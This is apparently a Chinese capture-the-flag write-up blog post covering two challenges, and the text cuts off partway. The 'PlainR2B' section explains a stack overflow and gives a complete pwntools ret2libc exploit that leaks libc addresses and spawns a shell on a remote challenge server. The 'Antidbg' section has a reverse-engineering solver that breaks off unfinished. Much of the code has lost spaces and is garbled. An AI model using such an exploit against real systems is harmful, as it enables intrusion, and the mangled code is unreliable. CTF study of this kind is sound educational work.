0x01 PlainR2B
这是一道比较简单的PWN题目,首先拖到IDA里简单看了一下程序,如图
发现在读取,没有栈保护,所以,在read0x34时,可能替换game返回址址,先通过write(1,write,4)(game作为write返回地址)。这样读出write地址,这样就可以得到system地址,因为又循环运行了,同样在0x804A06C写入/bin/sh\0,这样system就能运行。
Pythonexp如下:
frompwn import *
defrungameAgainPoc(p,yourname,flag):
p.recvuntil("First,what's your name?\n")
p.send(yourname+ "\n")
p.recvuntil("doyou want to get flag?\n")
p.send(flag)
pwnelf= ELF("./pwn")
libcelf= ELF("./libc-2.23.so")
gameadd= 0x080485CB
plt_write= pwnelf.symbols['write']
got_write= pwnelf.got['write']
#p= process('./pwn',env={'LD_PRELOAD':'./libc-2.23.so'})
p= remote('117.50.60.184', 12345)
rungameAgainPoc(p,"ichuqiu","0"*32+ p32(plt_write)+
p32(gameadd)+ p32(1) + p32(got_write) + p32(4))
write_addr= u32(p.recv(4))
print"pwn write " ,hex(write_addr)
libcelf_system_add= libcelf.symbols["system"] +
write_addr- libcelf.symbols["write"]
print"pwn libcelf_system_add",hex(libcelf_system_add)
rungameAgainPoc(p,"/bin/sh\0","0"*32+
p32(libcelf_system_add)+p32(gameadd)+ p32(0x804A06C))
p.interactive()
flag{62c51c85-1516-4ad8-989c-58ce8c29642e}
0x02 Antidbg
IDA查找关键函数,发现有一个循环比较
初步判断,是一个8位数,于是分开比较
#[ebp+var_6C]01050D02070106010206000B07010C06
#[ebp+var_4C]02080602
#[ebp+var_5C]0100070D020108080D000103040D0303
#[ebp+var_48]02050009
#[ebp+var_44]00000D02
defcover(buf):
buf= buf.decode("hex")
rbuf= ""
fori in range(len(buf) - 1,-1,-1):
rbuf+= buf[i]
returnrbuf
defcover_hex_lines(buf):
returnbuf.replace("","").replace("\r","").replace("\n","").decode("hex")
var_6c=cover("01050D02070106010206000B07010C06")
+cover("0100070D020108080D000103040D0303")
+cover("02080602") + cover("02050009")
+cover("00000D02")
#printlen(var_6c)
byte_402178= """02 02 02 02 03 01 01 02
0101 02 01 01 00 01 01 02 02 00 01 01 01 01 00
0101 02 02 00 01 01 02 02 01 01 01 01 01 02 01
0103 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0303 0D 04 03 01 00 0D 08 08 01 02 0D 07 00 01
060C 01 07 0B 00 06 02 01 06 01 07 02 0D 05 01
0000 00 00 EF 28 68 5B 00 00 00 00 02 00 00 00
4800 00 00 E4 22 00 00 E4 16 00 00 00 00 00 00
EF28 68 5B 00 00 00 00 0C 00 00 00 14 00 00 00
2C23 00 00 2C 17 00 00 00 00 00 00 EF 28 68 5B
0000 00 00 0D 00 00 00 54 02 00 00 40 23 00 00
4017 00 00 00 00 00 00 EF 28 68 5B 00 00 00 00
0E00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
A000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 30 40 00
E022 40 00 01 00 00 00 E8 20 40 00 00 00 00 00
0000 00 00 00 00 00 00 00 01 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0000 00 00 00 00 00 00 00 00 00 00 00 00 00 00"""
.replace("","").replace("\r","").replace("\n","").decode("hex")
byte_402138= """00 00 00 00 01 00 00 00
0200 00 00 03 00 00 00 04 00 00 00 05 00 00 00
0600 00 00 07 00 00 00 08 00 00 00 09 00 00 00
0A00 00 00 0B 00 00 00 0C 00 00 00 0D 00 00 00
0E00 00 00 0F 00 00 00"""
.replace("","").replace("\r","").replace("\n","").decode("hex")
dword_403018="""0200 00 00 02 00 00 00
0200 00 00 02 00 00 00 00 00 00 00 00 00 00 00
""".replace("","").replace("\r","").replace("\n","").decode("hex")
#text:0040110E mov ecx, [ebp+var_4]
#.text:00401111 xor ecx, ebp
#.text:00401113 mov dword_40301C, 3
#.text:0040111D mov dword_403020, 6
#.text:00401127 mov dword_403024, 7
#内存值有所改变,所以修改一下
dword_403018= dword_403018[0:4] + '\x03' + dword_403018[5:8]
+'\x06' + dword_403018[9:12] + '\x07'
+dword_403018[13:]
printdword_403018.encode("hex")
fori in range(0,42):
hightnum= ord(dword_403018[ord(byte_402178[i])*4])
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
微信扫码登录